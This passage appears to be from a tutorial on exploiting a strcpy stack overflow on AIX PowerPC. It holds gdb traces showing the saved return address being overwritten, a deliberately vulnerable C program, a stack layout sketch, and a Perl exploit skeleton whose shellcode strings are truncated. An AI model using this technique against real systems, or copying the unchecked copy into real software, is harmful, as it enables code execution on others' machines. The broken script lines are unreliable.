0x10000584
Breakpoint 1 at 0x10000560
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/simple_overflow

Breakpoint 1, 0x10000560 in main ()
(gdb) display/i $pc
1: x/i $pc 0x10000560
0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000
0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001
0x2ff22b88: 0x00000000 0xdeadbeef 0xdeadbeef 0xdeadbeef
0x2ff22b98: 0xdeadbeef 0xdeadbeef 0x20000460 0x10000000
(gdb)
0x2ff22ba8: 0x00000003 0x20000460 0x00000000 0x44222802
0x2ff22bb8: 0x100001cc 0x00000000 0x00000000 0x20000e70
0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b58 is the current stack pointer, and the word it points to is the address of the previous stack frame (0x2ff22bb0). From the stack contents, the lr saved in that previous frame is 0x100001cc, which means that once main returns, execution continues at this address. Let's first follow the program flow:
(gdb) until *0x1000056c
0x1000056c in main ()
1: x/i $pc 0x1000056c
r0      0x20        32
r1      0x2ff22b58  804399960
r2      0x20000e70  536874608
r3      0x2ff22b90  804400016
r4      0x20000534  536872244
r5      0x2ff22bbc  804400060
r6      0x0         0
r7      0x0         0
r8      0x0         0
r9      0x80808080  -2139062144
r10     0x7f7f7f7f  2139062143
r11     0x4         4
r12     0x80808080  -2139062144
r13     0xdeadbeef  -559038737
r14     0x1         1
r15     0x2ff22c00  804400128
r16     0x2ff22c08  804400136
r17     0x0         0
r18     0xdeadbeef  -559038737
r19     0xdeadbeef  -559038737
r20     0xdeadbeef  -559038737
r21     0xdeadbeef  -559038737
r22     0xdeadbeef  -559038737
r23     0xdeadbeef  -559038737
r24     0xdeadbeef  -559038737
r25     0xdeadbeef  -559038737
r26     0xdeadbeef  -559038737
r27     0xdeadbeef  -559038737
r28     0x20000460  536872032
r29     0x10000000  268435456
r30     0x3         3
r31     0x2ff22b58  804399960
pc      0x1000056c  268436844
ps      0x2d032     184370
cr      0x22222842  572663874
lr      0x1000056c  268436844
ctr     0x4         4
xer     0x0         0
fpscr   0x0         0
vscr    0x0         0
vrsave  0x0         0
(gdb) x/20x $r1
0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000
0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001
0x2ff22b88: 0x00000000 0xdeadbeef 0x31323334 0x35313233
0x2ff22b98: 0x34353132 0x33343531 0x32333435 0x31323334
(gdb)
0x2ff22ba8: 0x3d505245 0x53455256 0x45445350 0x4143453d
0x2ff22bb8: 0x41424344 0x00000000 0x00000000 0x20000e70
0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000
strcpy has completed, and the lr value saved in the previous stack frame has been overwritten with 0x41424344. Keep following the program flow:
(gdb) ni
0x10000570 in main ()
1: x/i $pc 0x10000570
0x10000574 in main ()
1: x/i $pc 0x10000574
0x10000578 in main ()
1: x/i $pc 0x10000578
0x1000057c in main ()
1: x/i $pc 0x1000057c
0x10000580 in main ()
1: x/i $pc 0x10000580
0x10000584 in main ()
1: x/i $pc 0x10000584
The purpose of these instructions was explained earlier: when main returns, it switches back to the previous stack frame, loads the word at r1+8 into the lr register, and then branches to the address in lr.
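Walking the two frame dumps above mechanically, as an added example (not code from the original article): it reads the back chain at r1 to locate the saved-LR slot, compares that slot between the before and after dumps, and measures its distance from vulnbuff. The dump words are transcribed from this page; taking 0x2ff22b90 (r3 after strcpy, i.e. strcpy's return value) as the address of vulnbuff is an assumption.

```c
#include <stdint.h>
#include <stdio.h>

/* Stack words transcribed from the two "x/20x $r1" dumps above (r1 = 0x2ff22b58),
 * 28 words each, before and after the strcpy. */
#define DUMP_BASE 0x2ff22b58u
#define NWORDS    28
static const uint32_t before[NWORDS] = {
    0x2ff22bb0, 0x0, 0x0, 0x0,  0x0, 0x0, 0x0, 0x0,  0x0, 0x0, 0x0, 0x1,
    0x0, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef,  0xdeadbeef, 0xdeadbeef, 0x20000460, 0x10000000,
    0x3, 0x20000460, 0x0, 0x44222802,  0x100001cc, 0x0, 0x0, 0x20000e70,
};
static const uint32_t after[NWORDS] = {
    0x2ff22bb0, 0x0, 0x0, 0x0,  0x0, 0x0, 0x0, 0x0,  0x0, 0x0, 0x0, 0x1,
    0x0, 0xdeadbeef, 0x31323334, 0x35313233,  0x34353132, 0x33343531, 0x32333435, 0x31323334,
    0x3d505245, 0x53455256, 0x45445350, 0x4143453d,  0x41424344, 0x0, 0x0, 0x20000e70,
};

/* Word stored at stack address addr, or 0 if addr lies outside the dump. */
static uint32_t word_at(const uint32_t *dump, uint32_t addr) {
    if (addr < DUMP_BASE || (addr & 3) || (addr - DUMP_BASE) / 4 >= NWORDS) return 0;
    return dump[(addr - DUMP_BASE) / 4];
}

/* Follow one link of the back chain: word 0 of main's frame is the caller's r1,
 * and the AIX PowerPC linkage area keeps the saved LR at caller_r1 + 8
 * (the "r1+8" that main's epilogue reloads into lr). */
uint32_t saved_lr_slot(const uint32_t *dump) {
    uint32_t caller_r1 = word_at(dump, DUMP_BASE);
    return caller_r1 ? caller_r1 + 8 : 0;
}

/* Value currently held in the saved-LR slot of the given dump. */
uint32_t saved_lr_value(const uint32_t *dump) {
    return word_at(dump, saved_lr_slot(dump));
}

/* Distance in bytes from vulnbuff to the saved-LR slot.  buf_addr is assumed to be
 * r3 after strcpy (strcpy returns its destination): 0x2ff22b90 on this page. */
uint32_t bytes_to_saved_lr(const uint32_t *dump, uint32_t buf_addr) {
    return saved_lr_slot(dump) - buf_addr;
}

int main(void) {
    printf("saved LR slot 0x%08x: 0x%08x before, 0x%08x after, %u bytes past vulnbuff\n",
           (unsigned)saved_lr_slot(before), (unsigned)saved_lr_value(before),
           (unsigned)saved_lr_value(after), (unsigned)bytes_to_saved_lr(before, 0x2ff22b90u));
    return 0;
}
```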
5. Learning how to exploit an overflow program on AIX PowerPC
Now that we understand how the overflow unfolds, let's try writing an exploit program:
-bash-2.05b$ cat vulnerable.c
/* vulnerable.c
 * Vulnerable program on the PowerPC architecture. */
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[]) {
    char vulnbuff[16];
    strcpy (vulnbuff, argv[1]);   /* no length check: argv[1] longer than 15 bytes overruns vulnbuff */
    printf ("%s\n", vulnbuff);
    getchar(); /* for debug */
}
-bash-2.05b$ gcc -o vulnerable vulnerable.c
Like operating systems on other architectures, AIX has a USER_UPPER (the bottom of the stack); its address is 0x2ff22fff. The stack layout is roughly as follows:
        stack bottom
        +--------------------------+ 0x2ff22fff
        |         reserved         |
        +--------------------------+
        |  environment variables   |
        +--------------------------+
        |    program arguments     |
        +--------------------------+
        | absolute path of program |
        +--------------------------+
        |       stack frames       |
SP ---> +--------------------------+
        |  stack growth direction  |
        .            |             .
        .            v             .
We can guess the address of the environment variables fairly accurately. Going by the debugging session above and some of watercloud's AIX exploit programs, the obvious first attempt at an exploit looks like this:
-bash-2.05b$ cat exploit.pl
#!/usr/bin/perl
#
# exploit.pl
# exploit program vulnerable
$CMD=\
$SHELLCODE=
\ \ \ \ \ \
\ \ \ \ \ \ \ \
$NOP=\
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,\
Let's debug it:
-bash-2.05b$ ./exploit.pl
/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@
In another terminal, attach gdb to vulnerable:
-bash-2.05b$ ps aux|grep vul
san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul
san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera
-bash-2.05b$ gdb vulnerable 44544
GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
Attaching to program: /home/san/vulnerable, process 44544
0xd01ea254 in read () from /usr/lib/libc.a(shr.o)
(gdb) disas main
Dump of assembler code for function main:
0x10000544
0x10000548